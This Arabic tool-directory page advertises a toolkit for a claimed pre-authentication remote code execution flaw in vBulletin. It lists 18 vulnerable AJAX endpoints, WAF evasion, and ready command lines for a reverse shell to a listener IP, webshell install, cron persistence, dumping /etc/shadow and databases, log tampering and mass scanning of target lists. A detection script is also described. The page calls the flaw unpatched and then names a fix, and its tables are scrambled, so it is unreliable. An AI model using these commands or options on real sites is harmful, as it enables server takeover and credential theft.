Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – ثغرة تنفيذ كود عن بُعد قبل المصادقة في vBulletin (CVSS 9.8). الثغرة في الإصدارات 5.x/6.x (غير مُصححة). استغلال متعدد عبر Endpoint Pool وAJAX وPHPFuck لتجاوز جدار الحماية. مجموعة أدوات كاملة: شل عكسي، بروكسي، استمرارية، ويب شل، عمليات قاعدة البيانات، التحكم في جدار الحماية، إدارة السجلات، فحص جماعي. نسختان: استغلال متعدد وفحص آمن. Python 3.8+ استخدمها بأخلاقية، والتزم بالقانون. 🔒 | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
تخطيط الشبكةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالتجاوز WAFاختبار الاختراقأداة الوصول عن بعدتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

أمن قواعد البيانات
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

عرض المستودع
410منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-61511 – ثغرة تنفيذ كود عن بُعد قبل المصادقة في vBulletin (CVSS 9.8). الثغرة في الإصدارات 5.x/6.x (غير مُصححة). استغلال متعدد عبر Endpoint Pool وAJAX وPHPFuck لتجاوز جدار الحماية. مجموعة أدوات كاملة: شل عكسي، بروكسي، استمرارية، ويب شل، عمليات قاعدة البيانات، التحكم في جدار الحماية، إدارة السجلات، فحص جماعي. نسختان: استغلال متعدد وفحص آمن. Python 3.8+ استخدمها بأخلاقية، والتزم بالقانون. 🔒

مشاركة

CVEPoC

CVE-2026-61511 – استغلال وتحقّق من ثغرة RCE قبل المصادقة في vBulletin

Python 3.8+ CVSS Author vBulletin

⚠️ للاستخدام الأخلاقي فقط – اختبار أمني مصرّح به
يوفر هذا المستودع أدوات للمتخصصين الأمنيين المعتمدين، وفرق الدفاع الأزرق، ومختبري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة حول العالم.


📖 نظرة عامة على الثغرة

CVE‑2026‑61511 هي ثغرة حقن eval() في PHP بمحرك عرض قوالب AJAX في vBulletin.
الإصدارات المتأثرة: 5.0.0 – 5.7.5 و6.0.0 – 6.2.1.

كيف تعمل

  1. نقاط هجوم متعددة – توجد الثغرة في عدة معالجات AJAX:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • نقاط نهاية متعددة /ajax/api/content_* /getIndexableContent
  2. ترميز PHPFuck – يتم تحويل الحمولة إلى سلسلة من عوامل تشغيل وأرقام PHP تتجاوز عوامل تصفية WAF وتسمح بتنفيذ كود PHP عشوائي.

  3. لا يتطلب مصادقة – يمكن للمهاجم إرسال طلب POST مُصمم إلى أي نقطة نهاية ضعيفة وتنفيذ أوامر النظام بصلاحيات خادم الويب.

  4. التأثير – اختراق كامل للخادم، وسرقة البيانات، والبوابات الخلفية، والحركة الجانبية، والاستمرارية. قم بترقية الإصدار!

التصحيح

  • vBulletin 6.2.2 ومستوى التصحيح 1 للإصدارات الأقدم يعالجان هذه المشكلة.
  • قم دائمًا بالترقية إلى أحدث إصدار.

🧰 الأدوات

الأداةالغرضالمستخدم المقصود
exploit.pyمجموعة أدوات كاملة تشمل شل عكسي، واستمرارية، وعمليات ملفات، وتفريغ قاعدة بيانات، وإدارة جدار الحماية، وإدارة السجلات، وإعادة توجيه المنافذ، ونشر مفاتيح SSH، وفحص الشبكة، والفحص الجماعي (متعدد الخيوط).

📊 مقارنة الميزات


🎯 ملخص حالات الاستخدام


⚙️ التثبيت

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

محتوى requirements.txt:

root@kitploit:~
request
urllib3

المعاملات 🌬️

السيناريوهات

مجموعة نقاط النهاية 🅿️

🛡️ الاستخدام المسؤول

  • استخدم هذه الأدوات فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
  • الوصول غير المصرح به غير قانوني وغير أخلاقي.
  • المؤلفون غير مسؤولين عن أي إساءة استخدام.
  • اتبع دائمًا قوانين وأنظمة بلدك.

يتم توفير هذا البرنامج لأغراض تعليمية واختبار أمني معتمد فقط.

تنزيل الأداة
فرق الأحمر / مختبري الاختراق المعتمدين
safecheck.pyأداة تحقق غير تدخلية تفحص الثغرة دون تنفيذ أي حمولة ضارة. تكتشف الإصدار، وتختبر جميع نقاط النهاية، وتُنشئ تقريرًا مفصلاً.فرق الأزرق / مدققي الأمان
الميزةexploit.pysafecheck.py
اكتشاف الثغرة✅✅
اكتشاف الإصدار✅✅
اختبار متعدد نقاط النهاية (18 مسارًا)✅✅
تنفيذ الأوامر✅❌
شل عكسي✅❌
رفع/تنزيل الملفات✅❌
آليات الاستمرارية✅❌
نشر شل الويب✅❌
عمليات قاعدة البيانات✅❌
جمع معلومات النظام✅✅
إدارة جدار الحماية✅❌
إدارة السجلات✅❌
إعادة توجيه المنافذ✅❌
نشر مفاتيح SSH✅❌
فحص الشبكة✅❌
الفحص الجماعي (متعدد الخيوط)✅❌
دعم البروكسي✅✅
إخراج تقرير JSON✅✅
قائمة تفاعلية✅❌
وضع غير تدخلي (آمن)❌✅
وضع مفصّل/تصحيح✅✅
تنفيذ أوامر مخصصة✅❌
تسلسل أوامر متعددة✅❌
قراءة ملفات عن بُعد✅❌
كتابة ملفات عن بُعد✅❌
إدارة مستخدمي النظام✅❌
تقنيات تجاوز جدار الحماية✅❌
مراوغة WAF (PHPFuck)✅✅
السيناريوالأداة الموصى بها
فريق الأزرق – التحقق مما إذا كان تثبيت vBulletin لديك ضعيفًاsafecheck.py
تدقيق أمني – تقييم ثغرات غير تدخليsafecheck.py
فريق الأحمر – اختبار اختراق معتمد مع استغلال كاملexploit.py
مكافآت الثغرات – اختبار الكشف المسؤولsafecheck.py
الفحص الجماعي – فحص أهداف متعددة بحثًا عن الثغرةexploit.py (الاكتشاف فقط)
الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقةsafecheck.py
المعاملالوصف
-t, --targetعنوان الهدف (مثال: http://forum.com/vb)
--proxyبروكسي HTTP (مثال: http://127.0.0.1:8080)
--timeoutمهلة الطلب بالثواني (الافتراضي: 10)
--retryعدد مرات إعادة المحاولة لكل مسار (الافتراضي: 3)
--outputحفظ تقرير مفصّل في ملف JSON
-v, --verboseإخراج مفصّل
-q, --quietوضع هادئ (إخراج محدود)
--lhostمطلوب للاستغلال – عنوان IP لاستقبال الاتصال
--lportمنفذ استقبال الاتصال (الافتراضي: 4444)
--threadsعدد الخيوط للفحص الجماعي (الافتراضي: 5)
--exploitتنفيذ الاستغلال بعد الاكتشاف
--fullهجوم كامل (جميع الوحدات)
--shellبدء شل عكسي
--webshellتثبيت شل ويب (/shell.php)
--persistتثبيت الاستمرارية (مهمة cron)
--dumpتفريغ قاعدة البيانات
--dump-credsتفريغ بيانات الاعتماد (/etc/passwd, /etc/shadow)
--interactiveقائمة تفاعلية بعد التحقق الناجح
#السيناريوالأمر
1فحص سريع للثغرةpython safecheck.py -t http://target.com/vb
2فحص مفصّل مع تقريرpython safecheck.py -t http://target.com/vb --output report.json -v
3شل عكسيpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4هجوم كامل (جميع الوحدات)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5فحص جماعي من ملفpython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6وضع القائمة التفاعليةpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#نقطة النهاية
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent